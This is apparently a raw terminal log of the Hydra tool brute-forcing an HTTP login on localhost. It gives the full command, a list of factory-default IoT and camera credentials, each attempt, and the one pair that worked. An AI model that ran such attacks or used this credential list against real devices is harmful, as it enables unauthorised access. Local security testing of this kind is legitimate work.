hydra -C cred_list.txt -t 12 -f -vV localhost http-get

Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2016-10-23 15:33:04
[WARNING] You must supply the web page as an additional option or via -m, default path set to /
[DATA] 12 tasks, 1 server, 72 login tries, ~6 tries per task
[DATA] attacking service http-get on port 80
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target localhost - login "666666" - pass "666666" - 1 of 72 [child 0]
[ATTEMPT] target localhost - login "888888" - pass "888888" - 2 of 72 [child 1]
[ATTEMPT] target localhost - login "Admin" - pass "1234" - 3 of 72 [child 2]
[ATTEMPT] target localhost - login "Admin" - pass "123456" - 4 of 72 [child 3]
[ATTEMPT] target localhost - login "Administrator" - pass "" - 5 of 72 [child 4]
[ATTEMPT] target localhost - login "Administrator" - pass "admin" - 6 of 72 [child 5]
[ATTEMPT] target localhost - login "Dinion" - pass "" - 7 of 72 [child 6]
[ATTEMPT] target localhost - login "admin1" - pass "password" - 8 of 72 [child 7]
[ATTEMPT] target localhost - login "admin" - pass "" - 9 of 72 [child 8]
[ATTEMPT] target localhost - login "admin" - pass "1111" - 10 of 72 [child 9]
[ATTEMPT] target localhost - login "admin" - pass "1111111" - 11 of 72 [child 10]
[ATTEMPT] target localhost - login "admin" - pass "1234" - 12 of 72 [child 11]
[ATTEMPT] target localhost - login "admin" - pass "12345" - 13 of 72 [child 0]
[ATTEMPT] target localhost - login "admin" - pass "123456" - 14 of 72 [child 1]
[ATTEMPT] target localhost - login "admin" - pass "4321" - 15 of 72 [child 2]
[ATTEMPT] target localhost - login "admin" - pass "54321" - 16 of 72 [child 3]
[ATTEMPT] target localhost - login "admin" - pass "7ujMko0admin" - 17 of 72 [child 4]
[ATTEMPT] target localhost - login "admin" - pass "9999" - 18 of 72 [child 5]
[ATTEMPT] target localhost - login "admin" - pass "admin" - 19 of 72 [child 6]
[ATTEMPT] target localhost - login "admin" - pass "admin1234" - 20 of 72 [child 7]
[ATTEMPT] target localhost - login "admin" - pass "fliradmin" - 21 of 72 [child 8]
[ATTEMPT] target localhost - login "admin" - pass "jvc" - 22 of 72 [child 9]
[ATTEMPT] target localhost - login "admin" - pass "meinsm" - 23 of 72 [child 0]
[ATTEMPT] target localhost - login "admin" - pass "pass" - 24 of 72 [child 1]
[ATTEMPT] target localhost - login "admin" - pass "password" - 25 of 72 [child 2]
[ATTEMPT] target localhost - login "admin" - pass "smcadmin" - 26 of 72 [child 3]
[ATTEMPT] target localhost - login "admin" - pass "wbox123" - 27 of 72 [child 4]
[ATTEMPT] target localhost - login "administrator" - pass "1234" - 28 of 72 [child 5]
[ATTEMPT] target localhost - login "guest" - pass "12345" - 29 of 72 [child 6]
[ATTEMPT] target localhost - login "guest" - pass "guest" - 30 of 72 [child 7]
[ATTEMPT] target localhost - login "root" - pass "" - 31 of 72 [child 8]
[ATTEMPT] target localhost - login "root" - pass "00000000" - 32 of 72 [child 9]
[ATTEMPT] target localhost - login "root" - pass "1111" - 33 of 72 [child 10]
[ATTEMPT] target localhost - login "root" - pass "1234" - 34 of 72 [child 11]
[ATTEMPT] target localhost - login "root" - pass "123456" - 35 of 72 [child 0]
[ATTEMPT] target localhost - login "root" - pass "4321" - 36 of 72 [child 1]
[ATTEMPT] target localhost - login "root" - pass "54321" - 37 of 72 [child 2]
[ATTEMPT] target localhost - login "root" - pass "6666666" - 38 of 72 [child 3]
[ATTEMPT] target localhost - login "root" - pass "7ujMko0admin" - 39 of 72 [child 4]
[ATTEMPT] target localhost - login "root" - pass "7ujMko0vizxv" - 40 of 72 [child 5]
[ATTEMPT] target localhost - login "root" - pass "888888" - 41 of 72 [child 6]
[ATTEMPT] target localhost - login "root" - pass "Admin" - 42 of 72 [child 7]
[ATTEMPT] target localhost - login "root" - pass "Zte521" - 43 of 72 [child 8]
[ATTEMPT] target localhost - login "root" - pass "admin" - 44 of 72 [child 9]
[ATTEMPT] target localhost - login "root" - pass "anko" - 45 of 72 [child 0]
[ATTEMPT] target localhost - login "root" - pass "camera" - 46 of 72 [child 1]
[ATTEMPT] target localhost - login "root" - pass "default" - 47 of 72 [child 2]
[ATTEMPT] target localhost - login "root" - pass "dreambox" - 48 of 72 [child 3]
[ATTEMPT] target localhost - login "root" - pass "hi3518" - 49 of 72 [child 4]
[ATTEMPT] target localhost - login "root" - pass "ikwb" - 50 of 72 [child 5]
[ATTEMPT] target localhost - login "root" - pass "ikwd" - 51 of 72 [child 6]
[ATTEMPT] target localhost - login "root" - pass "juantech" - 52 of 72 [child 7]
[ATTEMPT] target localhost - login "root" - pass "jvbzd" - 53 of 72 [child 8]
[ATTEMPT] target localhost - login "root" - pass "klv123" - 54 of 72 [child 9]
[ATTEMPT] target localhost - login "root" - pass "klv1234" - 55 of 72 [child 10]
[ATTEMPT] target localhost - login "root" - pass "pass" - 56 of 72 [child 11]
[ATTEMPT] target localhost - login "root" - pass "password" - 57 of 72 [child 0]
[ATTEMPT] target localhost - login "root" - pass "realtek" - 58 of 72 [child 1]
[ATTEMPT] target localhost - login "root" - pass "root" - 59 of 72 [child 2]
[ATTEMPT] target localhost - login "root" - pass "system" - 60 of 72 [child 3]
[ATTEMPT] target localhost - login "root" - pass "user" - 61 of 72 [child 4]
[ATTEMPT] target localhost - login "root" - pass "vizxv" - 62 of 72 [child 5]
[ATTEMPT] target localhost - login "root" - pass "xc3511" - 63 of 72 [child 6]
[ATTEMPT] target localhost - login "root" - pass "xmhdipc" - 64 of 72 [child 7]
[ATTEMPT] target localhost - login "root" - pass "zlxx." - 65 of 72 [child 8]
[ATTEMPT] target localhost - login "service" - pass "service" - 66 of 72 [child 9]
[ATTEMPT] target localhost - login "supervisor" - pass "supervisor" - 67 of 72 [child 10]
[ATTEMPT] target localhost - login "support" - pass "support" - 68 of 72 [child 0]
[ATTEMPT] target localhost - login "tech" - pass "tech" - 69 of 72 [child 1]
[ATTEMPT] target localhost - login "ubnt" - pass "ubnt" - 70 of 72 [child 2]
[ATTEMPT] target localhost - login "user" - pass "user" - 71 of 72 [child 3]
[STATUS] attack finished for localhost (waiting for children to complete tests)
[80][www] host: 127.0.0.1   login: user   password: user
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-10-23 15:33:05
